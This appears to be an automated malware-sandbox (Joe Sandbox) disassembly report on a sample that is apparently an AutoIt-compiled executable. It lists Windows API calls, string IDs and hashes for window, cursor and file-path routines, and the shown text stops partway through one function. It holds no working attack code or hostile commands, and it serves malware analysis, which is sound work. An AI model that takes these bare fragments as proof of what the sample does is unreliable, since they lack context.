• String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
• API String ID: 3974292440-719923060
• Opcode ID: 96c251010a45285f7d75f577ec69442508efcb2b868f5a45e52d3f3d2aed6d45
• Instruction ID: 0ed81fc3c69ce157d316526e3959ecc0b9791f608467882f28c88701414c6e59
• Opcode Fuzzy Hash: 96c251010a45285f7d75f577ec69442508efcb2b868f5a45e52d3f3d2aed6d45
• Instruction Fuzzy Hash: 02A18F702042459BCB14FF20D851ABAB3E5FF85314F149969B9966B3D2DF30ED0ACB62
APIs
• GetClassNameW.USER32(?,?,00000100), ref: 00E1CF91
• __swprintf.LIBCMT ref: 00E1D032
• _wcscmp.LIBCMT ref: 00E1D045
• SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00E1D09A
• _wcscmp.LIBCMT ref: 00E1D0D6
• GetClassNameW.USER32(?,?,00000400), ref: 00E1D10D
• GetDlgCtrlID.USER32(?), ref: 00E1D15F
• GetWindowRect.USER32(?,?), ref: 00E1D195
• GetParent.USER32(?), ref: 00E1D1B3
• ScreenToClient.USER32(00000000), ref: 00E1D1BA
• GetClassNameW.USER32(?,?,00000100), ref: 00E1D234
• _wcscmp.LIBCMT ref: 00E1D248
• GetWindowTextW.USER32(?,?,00000400), ref: 00E1D26E
• _wcscmp.LIBCMT ref: 00E1D282
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
• String ID: %s%u
• API String ID: 3119225716-679674701
• Opcode ID: 0deec621af7e7091671387ba01f2b91653e25b9583df318265cad2ad4ab18bfd
• Instruction ID: 76860fc375289e9c4ff0841dadf9d90812f0c62977f92bf12be17e7f8b50a668
• Opcode Fuzzy Hash: 0deec621af7e7091671387ba01f2b91653e25b9583df318265cad2ad4ab18bfd
• Instruction Fuzzy Hash: F4A1BF71608202AFD715DF64CC84BEAB7E8FF48358F005519F9A9E2190D730EA85CBA1
APIs
• GetClassNameW.USER32(00000008,?,00000400), ref: 00E1D8EB
• _wcscmp.LIBCMT ref: 00E1D8FC
• GetWindowTextW.USER32(00000001,?,00000400), ref: 00E1D924
• CharUpperBuffW.USER32(?,00000000), ref: 00E1D941
• _wcscmp.LIBCMT ref: 00E1D95F
• _wcsstr.LIBCMT ref: 00E1D970
• GetClassNameW.USER32(00000018,?,00000400), ref: 00E1D9A8
• _wcscmp.LIBCMT ref: 00E1D9B8
• GetWindowTextW.USER32(00000002,?,00000400), ref: 00E1D9DF
• GetClassNameW.USER32(00000018,?,00000400), ref: 00E1DA28
• _wcscmp.LIBCMT ref: 00E1DA38
• GetClassNameW.USER32(00000010,?,00000400), ref: 00E1DA60
• GetWindowRect.USER32(00000004,?), ref: 00E1DAC9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
• String ID: @$ThumbnailClass
• API String ID: 1788623398-1539354611
• Opcode ID: 7d2e1d89ae7245354abc27c8a217b2f8db65b4482ca7cec18188b90201d86e6e
• Instruction ID: de1b25c38ccfcb1dfddd5ad3e3db356fc7fc20e68cfc40a8d22003b421526f39
• Opcode Fuzzy Hash: 7d2e1d89ae7245354abc27c8a217b2f8db65b4482ca7cec18188b90201d86e6e
• Instruction Fuzzy Hash: 7481A13110C3459BDB05DF10DC81FAA7BE8EF84758F046469FD8AAA096DB70ED85CBA1
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __wcsnicmp
                                                                                                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                  • API String ID: 1038674560-1810252412
                                                                                                                  • Opcode ID: 14bbe3353c4f17b49e747496bab980a7e540fd24604822b7412522a408a2ae16
                                                                                                                  • Instruction ID: 863494bb091d45143066648ca8364b78a663559eb7153614f2b1bf3b5a2a39ae
                                                                                                                  • Opcode Fuzzy Hash: 14bbe3353c4f17b49e747496bab980a7e540fd24604822b7412522a408a2ae16
                                                                                                                  • Instruction Fuzzy Hash: 77318C32A48349BADF18FA61DD43FEEB3A49F20744F202129F541B10D1FB61AE84C6B1
                                                                                                                  APIs
                                                                                                                  • LoadIconW.USER32(00000063), ref: 00E1EAB0
                                                                                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00E1EAC2
                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00E1EAD9
                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00E1EAEE
                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00E1EAF4
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00E1EB04
                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00E1EB0A
                                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00E1EB2B
                                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00E1EB45
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00E1EB4E
                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00E1EBB9
                                                                                                                  • GetDesktopWindow.USER32 ref: 00E1EBBF
                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00E1EBC6
                                                                                                                  • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00E1EC12
                                                                                                                  • GetClientRect.USER32(?,?), ref: 00E1EC1F
                                                                                                                  • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00E1EC44
                                                                                                                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00E1EC6F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3869813825-0
                                                                                                                  • Opcode ID: 14df0ee992ae41d3891c27a93c48d51aa8c4a7a5c284bb8a9f9d152e7e1402d8
                                                                                                                  • Instruction ID: f16985c3279339d2d5cb73a1666ff2c8dd876691339c61e93d6aad4d4205cc5d
                                                                                                                  • Opcode Fuzzy Hash: 14df0ee992ae41d3891c27a93c48d51aa8c4a7a5c284bb8a9f9d152e7e1402d8
                                                                                                                  • Instruction Fuzzy Hash: FE513C71A04709AFDB209FA9DD89EAFBBF5FF04708F004918F556B26A0C7B4A944CB10
                                                                                                                  APIs
                                                                                                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 00E379C6
                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00E379D1
                                                                                                                  • LoadCursorW.USER32(00000000,00007F03), ref: 00E379DC
                                                                                                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 00E379E7
                                                                                                                  • LoadCursorW.USER32(00000000,00007F01), ref: 00E379F2
                                                                                                                  • LoadCursorW.USER32(00000000,00007F81), ref: 00E379FD
                                                                                                                  • LoadCursorW.USER32(00000000,00007F88), ref: 00E37A08
                                                                                                                  • LoadCursorW.USER32(00000000,00007F80), ref: 00E37A13
                                                                                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 00E37A1E
                                                                                                                  • LoadCursorW.USER32(00000000,00007F83), ref: 00E37A29
                                                                                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 00E37A34
                                                                                                                  • LoadCursorW.USER32(00000000,00007F82), ref: 00E37A3F
                                                                                                                  • LoadCursorW.USER32(00000000,00007F84), ref: 00E37A4A
                                                                                                                  • LoadCursorW.USER32(00000000,00007F04), ref: 00E37A55
                                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00E37A60
                                                                                                                  • LoadCursorW.USER32(00000000,00007F89), ref: 00E37A6B
                                                                                                                  • GetCursorInfo.USER32(?), ref: 00E37A7B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Cursor$Load$Info
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2577412497-0
                                                                                                                  • Opcode ID: be9483a671097e9a3677483fb65406a286a93592fce0e0093a8a02829eba7e82
                                                                                                                  • Instruction ID: 453debed5907c8411e8d20df4ea624eea8de447817ff7b33276ebecbb0e65e6e
                                                                                                                  • Opcode Fuzzy Hash: be9483a671097e9a3677483fb65406a286a93592fce0e0093a8a02829eba7e82
                                                                                                                  • Instruction Fuzzy Hash: F03116B0D0831E6ADB609FB68C8995FBEE8FF04754F504526E54DF7180DA78A500CFA1
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFE968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00DEC8B7,?,00002000,?,?,00000000,?,00DE419E,?,?,?,00E7DC00), ref: 00DFE984
                                                                                                                    • Part of subcall function 00DE660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DE53B1,?,?,00DE61FF,?,00000000,00000001,00000000), ref: 00DE662F
                                                                                                                  • __wsplitpath.LIBCMT ref: 00DEC93E
                                                                                                                    • Part of subcall function 00E01DFC: __wsplitpath_helper.LIBCMT ref: 00E01E3C
                                                                                                                  • _wcscpy.LIBCMT ref: 00DEC953
                                                                                                                  • _wcscat.LIBCMT ref: 00DEC968
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00DEC978
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00DECABE
                                                                                                                    • Part of subcall function 00DEB337: _wcscpy.LIBCMT ref: 00DEB36F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                  • API String ID: 2258743419-1018226102
                                                                                                                  • Opcode ID: ba3a9582c4c35e7a7102eb4c70b7e352a7f133705e9677f00bf4e290ade86e4c
                                                                                                                  • Instruction ID: db1074a9f4df085d1a6d6f270bfae52557613abda963afea5d6b70571037e8b4
                                                                                                                  • Opcode Fuzzy Hash: ba3a9582c4c35e7a7102eb4c70b7e352a7f133705e9677f00bf4e290ade86e4c
                                                                                                                  • Instruction Fuzzy Hash: 3A12A2715083819FC724EF25C881AAFBBE5FF98344F04591DF999A3261DB30DA49CB62
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00E4CEFB
                                                                                                                  • DestroyWindow.USER32(?,?), ref: 00E4CF73
                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00E4CFF4
                                                                                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00E4D016
                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E4D025
                                                                                                                  • DestroyWindow.USER32(?), ref: 00E4D042
                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00DE0000,00000000), ref: 00E4D075
                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E4D094
                                                                                                                  • GetDesktopWindow.USER32 ref: 00E4D0A9
                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00E4D0B0
                                                                                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00E4D0C2
                                                                                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00E4D0DA
                                                                                                                    • Part of subcall function 00DFB526: GetWindowLongW.USER32(?,000000EB), ref: 00DFB537
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                                                                  • String ID: 0$tooltips_class32
                                                                                                                  • API String ID: 3877571568-3619404913
                                                                                                                  • Opcode ID: d65be3490cd1cbd307bbde09979dce5fb228817d2d23f516214827362203145f
                                                                                                                  • Instruction ID: b8f58043b6c0526bc5532cec653b9e22259c08d6f1a8d5bfdbef882350bd4f09
                                                                                                                  • Opcode Fuzzy Hash: d65be3490cd1cbd307bbde09979dce5fb228817d2d23f516214827362203145f
                                                                                                                  • Instruction Fuzzy Hash: FD7102B0648305AFD720CF28DC85F7A37EAEB89748F44551DF985A72A1D770E846CB22
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00E53973,00000016,0000138C,00000016,?,00000016,00E7DDB4,00000000,?), ref: 00E226F1
                                                                                                                  • LoadStringW.USER32(00000000,?,00E53973,00000016), ref: 00E226FA
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00E53973,00000016,0000138C,00000016,?,00000016,00E7DDB4,00000000,?,00000016), ref: 00E2271C
                                                                                                                  • LoadStringW.USER32(00000000,?,00E53973,00000016), ref: 00E2271F
                                                                                                                  • __swprintf.LIBCMT ref: 00E2276F
                                                                                                                  • __swprintf.LIBCMT ref: 00E22780
                                                                                                                  • _wprintf.LIBCMT ref: 00E22829
                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E22840
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR$s9
                                                                                                                  • API String ID: 618562835-2846937808
                                                                                                                  • Opcode ID: ae7affa909fcabfc5ed0c216b2081440f19fcfe916df55da28fd596d0cb7a00e
                                                                                                                  • Instruction ID: 949503d5854ec295313fefe863fe4cc45b93a1a4d0fc51fa770afc822994edf3
                                                                                                                  • Opcode Fuzzy Hash: ae7affa909fcabfc5ed0c216b2081440f19fcfe916df55da28fd596d0cb7a00e
                                                                                                                  • Instruction Fuzzy Hash: 70412B72800258BACB15FBE1ED86EEEB778EF15344F501069B60176092EA60AF49CB71
                                                                                                                  APIs
                                                                                                                  • VariantInit.OLEAUT32(00000000), ref: 00E2AB3D
                                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00E2AB46
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00E2AB52
                                                                                                                  • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00E2AC40
                                                                                                                  • __swprintf.LIBCMT ref: 00E2AC70
                                                                                                                  • VarR8FromDec.OLEAUT32(?,?), ref: 00E2AC9C
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00E2AD4D
                                                                                                                  • SysFreeString.OLEAUT32(00000016), ref: 00E2ADDF
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00E2AE35
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00E2AE44
                                                                                                                  • VariantInit.OLEAUT32(00000000), ref: 00E2AE80
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                                                  • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                  • API String ID: 3730832054-3931177956
                                                                                                                  • Opcode ID: cd3ce13034083239bdf89ac6f422f21a4fe5da2ef26514e74817585a8806cdc9
                                                                                                                  • Instruction ID: fe25417ef8820a19c0cabb813cc495510936d5e8ef266a991ebe8598d192274e
                                                                                                                  • Opcode Fuzzy Hash: cd3ce13034083239bdf89ac6f422f21a4fe5da2ef26514e74817585a8806cdc9
                                                                                                                  • Instruction Fuzzy Hash: 63D12331A04625DBDB209F65E885BBEB7B6FF04B00F1994A5E415BB181DB70EC40DBB2
                                                                                                                  APIs
                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00E471FC
                                                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E47247
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BuffCharMessageSendUpper
                                                                                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                  • API String ID: 3974292440-4258414348
                                                                                                                  • Opcode ID: 8834e688179a0d247d701180bfd3ef5515eb5111b1acaa3a5721cbe915bf6bf0
                                                                                                                  • Instruction ID: 674cbe0820fdbddb8d4bd0ae7e517edfcd3f13dee50f015bceae3d9e0827fcdf
                                                                                                                  • Opcode Fuzzy Hash: 8834e688179a0d247d701180bfd3ef5515eb5111b1acaa3a5721cbe915bf6bf0
                                                                                                                  • Instruction Fuzzy Hash: 0E9190702082419BCB04EF10D851A6EB7A1FF84314F159858FD96673A3DB70ED4ACBA1
                                                                                                                  APIs
                                                                                                                  • EnumChildWindows.USER32(?,00E1CF50), ref: 00E1CE90
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ChildEnumWindows
                                                                                                                  • String ID: 4+$CLASS$CLASSNN$H+$INSTANCE$L+$NAME$P+$REGEXPCLASS$T+$TEXT
                                                                                                                  • API String ID: 3555792229-2655548891
                                                                                                                  • Opcode ID: 34b7ac386fc3ede0926f062dd0d3b0669a0bf83a1334099d7e49f9bdf1619b54
                                                                                                                  • Instruction ID: 1b51d4b9ee7384385071e01652ed791213a91b948cae64e24721e2e5d2116806
                                                                                                                  • Opcode Fuzzy Hash: 34b7ac386fc3ede0926f062dd0d3b0669a0bf83a1334099d7e49f9bdf1619b54
                                                                                                                  • Instruction Fuzzy Hash: C4917130640646AACB18EF60C481BEEFBA5FF04344F64A569E949F7191DF306999CBE0
                                                                                                                  APIs
                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00E4E5AB
                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00E4BEAF), ref: 00E4E607
